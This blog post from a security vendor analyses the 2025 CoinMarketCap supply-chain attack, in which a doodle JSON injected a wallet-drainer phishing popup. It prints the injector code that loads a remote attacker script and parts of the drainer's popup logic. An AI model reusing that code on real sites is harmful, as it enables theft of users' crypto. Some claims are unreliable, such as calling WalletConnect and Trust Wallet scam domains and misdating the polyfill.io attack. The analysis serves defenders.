Back to blog

CoinMarketCap Client-Side Attack: A Comprehensive Analysis

Saturday, June 21st, 2025

H

Himanshu Anand

On June 20, 2025, CoinMarketCap (CMC)—a cornerstone of the cryptocurrency ecosystem, relied upon by millions for real-time crypto data—experienced a significant security incident. A client-side attack compromised its frontend, tricking users into connecting their crypto wallets through a sophisticated phishing scheme. This breach underscores critical vulnerabilities in supply chain security and the evolving tactics of cybercriminals targeting the crypto space.

Below, we break down the attack in two layers: a high-level summary for non-technical stakeholders and a detailed technical analysis for security professionals.

High-Level Summary: What Happened?

Source:
https://x.com/DarkWebInformer/status/1936209452878745680

On June 20, 2025, users visiting CoinMarketCap’s homepage began seeing unexpected popups. These popups, designed to mimic CoinMarketCap’s branding, urged users to “verify their wallets” to “maintain full access” to the platform. The popups were not part of CMC’s legitimate features—they were the result of a client-side attack that hijacked the website’s frontend.

Attack Timing 

Source:
https://x.com/blockaid_/status/1936199273701687702

On June 20, 2025, users visiting CoinMarketCap’s homepage began seeing unexpected popups. These popups, designed to mimic CoinMarketCap’s branding, urged users to “verify their wallets” to “maintain full access” to the platform.

Critical Timing: The first malicious transaction linked to the attack was executed at 4:57 PM EST—a time likely chosen to coincide with the end of the workday for engineers and security teams, delaying immediate detection.

Key Takeaways for Non-Technical Stakeholders

  • How It Started: The attack began with a small, seemingly harmless element on CMC’s homepage: a “doodle” image (a decorative graphic, like a holiday-themed logo).
  • What Happened Next: This doodle image was linked to a third-party resource (a JSON file) hosted on an external domain (cdnkit[.]io). This resource contained hidden code that injected a fake popup into the user’s browser.
  • The Scam: The popup looked legitimate, using CMC’s colors, logos, and urgent language to trick users into connecting their crypto wallets (e.g., MetaMask, Phantom). Once connected, attackers could steal funds.
  • Why It’s Serious: This was a supply chain attack, meaning the breach didn’t target CMC’s own servers but a third-party tool or resource used by CMC. Such attacks are hard to detect because they exploit trusted elements of a platform.

Technical Deep Dive: How the Attack Worked

To understand the attack’s mechanics, we break it into stages, from the initial trigger to the final payload.

Stage 1: The Doodle Image—Initial Compromise

CoinMarketCap’s homepage included a “doodle” section, a common feature for holidays or events (e.g., a special logo for World Heart Day). This doodle was loaded dynamically via an API request to https://api[.]coinmarketcap[.]com/content/v3/doodle/get?type=5

The API returned a JSON file containing metadata about active doodles, including links to image files.

The Malicious JSON Response

The JSON response included a reference to a file hosted on cdnkit[.]io:

"lightModeFile": "https://static[.]cdnkit[.]io/cmc/6855a83d80876056dab0a5cf[.]json"

This URL did not point to a simple image. Instead, it returned another JSON file with embedded JavaScript code.

Stage 2: Injected JavaScript—Client-Side Execution

The JSON from cdnkit[.]io contained a hidden JavaScript snippet designed to run in the user’s browser. Here’s a simplified breakdown of the code:

// Check if the attack has already been injected  
if (!window.cmcInjected) {  
  window.cmcInjected = true;  

  // Modify the page to hide legitimate elements (e.g., the real CMC logo)  
  const logo = document.querySelector('.cmc-logo');  
  if (logo) {  
    logo.title = 'Go to homepage'; // Fake title to mimic legitimacy  
    logo.removeAttribute('data-text');  
  }  

  // Add CSS to style the fake popup  
  const style = document.createElement('style');  
  style.textContent = `.cmc-logo svg{margin-top:-3px}...`; // Hides real elements  
  document.head.appendChild(style);  

  // Inject the malicious popup script  
  const script = document.createElement('script');  
  script.src = 'https://static[.]cdnkit[.]io/cmc/popup[.]js';  
  document.head.appendChild(script);  
}

Key Observations

  • Client-Side Execution: The code runs in the user’s browser, not on CMC’s servers. This bypasses server-side security tools.
  • Persistence Check: The window.cmcInjected flag ensures the script runs only once per session, avoiding detection.
  • DOM Manipulation: The script modifies the page’s HTML/CSS to hide legitimate elements (e.g., the real CMC logo) and prepare for the fake popup.

Stage 3: The Fake Popup—Phishing Interface

The injected script (popup[.]js, hosted on blockassets[.]app) created a realistic-looking overlay. Here’s how it worked:

The popup mimicked CMC’s design, with:

  • A “Verify Your Wallet” title.
  • A message urging urgency: “Please connect your wallet now to authenticate and maintain full access to your CoinMarketCap account.”
  • A “Connect Wallet” button styled to match CMC’s UI.

JavaScript Logic

The popup[.]js script included functions to:

  1. Display the Popup: Add a full-screen overlay with the fake message.
  2. Handle User Interaction: When the user clicks “Connect Wallet,” the script attempts to connect to a crypto wallet (e.g., MetaMask, Phantom).
  3. Data Exfiltration: If connected, the script communicates with rogue domains (e.g., walletconnect[.]com, trustwallet[.]com) to steal wallet credentials or private keys.

Stage 4: Domain Analysis—Suspicious Infrastructure

The attack relied on domains with clear red flags:

Domain Details
cdnkit[.]io Hosted the initial malicious JSON. Domain registered in 2020; no direct link to CMC.
blockassets[.]app Hosted popup[.]js and f43f9316-f6a5-4626-bafd-fd4fd52cb490[.]js. Domain's WHOIS data shows it's not owned by CMC.
admin2[.]prod[.]coinmarketcap[.]supply A misspelled domain (supply vs. com) mimicking CMC's infrastructure. WHOIS shows it's 2,677 days old (created in 2018) and not owned by CMC.
walletconnect[.]com Redirects to reown[.]com, a known scam-related domain.
trustwallet[.]com Historically linked to fraudulent browser extensions (per user reviews).

Stage 5: Wallet Drainer—Technical Payloads

The popup[.]js script interacted with a larger JavaScript library (hosted on blockassets[.]app) that included functions for:

  • Wallet Connection: Detecting and connecting to popular wallets (MetaMask, Phantom, etc.).
  • Adaptive Attack Logic: Customizing the phishing flow based on what wallet type was detected to avoid security warnings and failed signatures.
  • Transaction Signing: Tricking users into signing malicious transactions (e.g., approving token transfers).
  • Error Handling: Displaying fake error messages (e.g., “Your wallet is blacklisted”) to pressure users into retrying with different wallets.

Example Code Snippet

The customPopupOpen function in popup[.]js controlled the popup’s behavior:

window.customPopupOpen = function(params) {  
  const stepName = params.stepName;  
  return new Promise((resolve) => {  
    const errorSteps = ["blacklisted", "connect_empty", "connect_too_low", ...];  
    
    if (errorSteps.includes(stepName)) {  
      // Show fake error message  
      injectToasterMessage({  
        blacklisted: "Your wallet is not AML clear, you can't use it!",  
        connect_empty: "For security reasons we can't allow you to connect empty or new wallet.",  
        ...  
      }[stepName]);  
    } else {  
      // Show loading spinner to trick users  
      modalFooter.classList.add("loading");  
      resolve(); // Continue drainer script  
    }  
  });  
};

Post-Attack Revelations

Source:
https://x.com/ReyXBF/status/1936276267797475526

In the hours following the incident, a Telegram channel named “CommLeaks” shared screenshots allegedly from the attacker’s control panel. These images, tied to the “Inferno Drainer” (a well-documented malicious tool for draining crypto wallets), revealed:

  • Total Stolen Funds: Approximately $43,266 USD was siphoned from 110 victims who interacted with the fake wallet verification popup.
  • Attack Scale: The dashboard highlighted the attack’s reach, with hundreds of users tricked into connecting their wallets. This underscores the effectiveness of the social engineering tactics (urgency, realistic UI) paired with the client-side compromise.

Why This Attack Matters

The Growing Threat of Third-Party JS Attacks

The CoinMarketCap breach is part of a broader trend of supply chain compromises via third-party JavaScript. Attackers increasingly target libraries, CDNs, and SaaS tools integrated into websites. For example:

  • The Pollyfill attack (2025) saw malicious code distributed via cdn[.]polyfill[.]io, a widely used service for browser compatibility 
  • Third-party scripts often have access to sensitive user data (e.g., cookies, wallet addresses), making them prime targets 

Why Traditional Defenses Fail:

  • Server-side security tools (firewalls, WAFs) cannot inspect client-side code execution.
  • Even trusted services (e.g., analytics platforms) can be compromised, as seen in the CoinMarketCap doodle attack.

Supply Chain Vulnerabilities

This incident is a textbook example of a supply chain attack. Attackers did not breach CoinMarketCap’s servers directly. Instead, they compromised a third-party resource (the doodle image’s JSON file) that CMC’s frontend trusted. This is akin to attacking a weak link in a chain—once the third-party resource was compromised, the attack propagated to all users loading CMC’s homepage.

Client-Side Risks

Client-side attacks (code running in the user’s browser) are particularly dangerous because:

  • They bypass server-side security tools (e.g., firewalls, intrusion detection systems).
  • They exploit user trust in a familiar platform (CMC).
  • They can spread quickly, as the malicious code is loaded with every page visit.

How to Stay Protected

For Users

  • Avoid Unsolicited Popups: Never connect your wallet via a popup, even on trusted sites. Legitimate platforms will not ask for wallet connections via unexpected popups.
  • Use Ad Blockers: Tools like uBlock Origin or AdGuard can block malicious scripts from loading.
  • Verify Domains: Check URLs for typos (e.g., coinmarketcap[.]supply vs. coinmarketcap[.]com).
  • Scrutinize Every Approval: Before signing, read the details in your wallet carefully. Be extra wary of requests asking for broad permissions.

For Platforms (e.g., CMC)

  • Audit Third-Party Integrations: Regularly review all external resources (images, scripts, APIs) loaded on your platform.
  • Subresource Integrity (SRI): SRI's can be used to lock scripts to hashes (e.g., <script src="https://cdn[.]example[.]com/library[.]js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" crossorigin="anonymous"></script>). However, in most cases SRI will not be an option due to JavaScript's highly dynamic behavior. This is what c/side aims to solve.
  • Monitor Client-Side Activity: Use tools like Sentry or New Relic to detect unexpected JavaScript execution.

Leverage Third-Party JS Monitoring Tools: Third-party scripts are a critical part of the modern web supply chain, but they also introduce risks. Malicious code injected via third-party libraries (e.g., analytics tools, ad networks, or polyfills) can compromise user data or enable attacks like the CoinMarketCap breach 

How c/side Can Help: Platforms like c/side specialize in monitoring, securing, and optimizing third-party JavaScript. Their services include:

  • Real-Time Payload Analysis: Track every request to detect malicious changes in third-party scripts 
  • Supply Chain Attack Detection: Identify compromised dependencies (e.g., the 2025 cdn[.]polyfill[.]io incident that injected malicious code into thousands of sites) 
  • PCI Compliance Support: Ensure third-party integrations meet security standards for industries handling sensitive data 

Actionable Step: Get a free account at cside.dev to start monitoring your third-party scripts and protect against supply chain vulnerabilities.

Conclusion

The CoinMarketCap breach is a stark reminder of the fragility of trust in the digital age. By hijacking a minor element like a doodle image, attackers infiltrated a platform relied upon by millions and weaponized that trust to steal funds. As crypto adoption grows, so too does the need for vigilance—both from platforms securing their supply chains and users scrutinizing every interaction.

For security teams, this incident underscores the importance of supply chain risk management. For users, it’s a call to stay alert: even trusted platforms can fall victim to clever phishing tactics.

Special thanks to our friend and guest blog contributor, Jack LaFond.

H

More About Himanshu Anand

I'm a software engineer and security analyst at c/side.